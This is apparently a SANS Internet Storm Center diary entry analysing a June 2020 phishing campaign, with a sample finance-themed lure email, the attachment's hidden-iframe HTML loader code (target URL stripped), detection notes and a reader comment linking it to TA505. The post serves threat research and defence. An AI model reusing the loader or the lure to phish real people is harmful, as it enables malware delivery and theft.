HTML based Phishing Run

Published: 2020-06-15
Last Updated: 2020-06-15 16:14:38 UTC
by Rick Wanner (Version: 1)
2 comment(s)

An intresting phishing run started over the weekend.  At first glance it looks pretty typical...a clumsy email with an attachment with some vital and useful information.  Although I have already seen several different message bodies, this is one sample:

From:Jane Edwards <>
Sent:Friday, June 12, 2020 10:16 AM

Please find attached a copy of current procedures in place for:

Concur PO & Expenses processing
Raising Sales Invoices
Raising Purchase Invoices
Recording Consolidated AR & AP at Month End.

I am also working on a Customer spreadsheet (expanding on records held previously ) recording :
Revenue Type
Invoice Frequency
Unit Price
Is a PO required ? if so what type.
I thought that this would be useful if coding and dimensions were included.

Jane Edwards | LedgerController

The attachment in this case was an html file called PROCEDURES.html containing the following:

<div style="display:none;">
<div id="placeholder"></div>

<script id="iframeTemplate" type="text/html">
    <iframe style="width: 100%; height: 100%; border: 0px" src="">


<script type="text/javascript">
var element,

element = document.getElementById("placeholder");
template = document.getElementById("iframeTemplate");
html = template.innerHTML;

element.innerHTML = html;
<div style="display:none;">

With assistance from reader Carsten I was also able to get a number of the other URLs used in these messages.

hxxp:// - Down

There are some detections on the attachments, but Virustotal has almost no detections for the websites. Interestingly Sophos antivirus is listed as "Unrated" on VirusTotal, but my Sophos test machine is catching the attachments as Troj/HTMLDwn-UA.

Running a few of these domains through, it appears very similar and most likely related web pages have been around for at least a week.

So far this is looking like a very clumsy campaign.  But if past history tells us anything these clumsy campaigns will sometimes get better and cause some chaos.  So it is worth keeping an eye on.

If anybody has any more details, they would be greatly appreciated. I would be especially interested in getting my hands on a couple more samples of the attachments. If you have access to some, I would appreciated it if you could zip up a few (password 'infected') and send them to me via the contact form.

-- Rick Wanner MSISE - rwanner at isc dot sans dot edu - - Twitter:namedeplume (Protected)

Keywords: HTML Phishing
2 comment(s)


I've been seeing a lot of phishing emails coming in with HTML attachments, but none of them using the iframe method. I've now setup a filter for HTML attachments to resolve the issue. Let me know if you would like any of them, otherwise I will keep an eye out for ones that use iframes in them.
I believe this is from the TA505 campaign on June 12th. I recognize that PROCEDURES.html file and 4/5 phishing URLs. They came from a variety of compromised senders, used these phishing links to direct to recently registered domains to download a maldoc that asks to "Enable Content". The maldoc tries to reach out to TA505 controlled domains and apparently download Get2 (which I cannot confirm as I only saw the maldoc reach out to the domain and never received the payload). See the blog below for a good write-up on what the final payload does and the goal of these phishing emails (ransomware). You may also want to check out #TA505 on twitter for some sample maldocs and the payload domains for different waves.

Diary Archives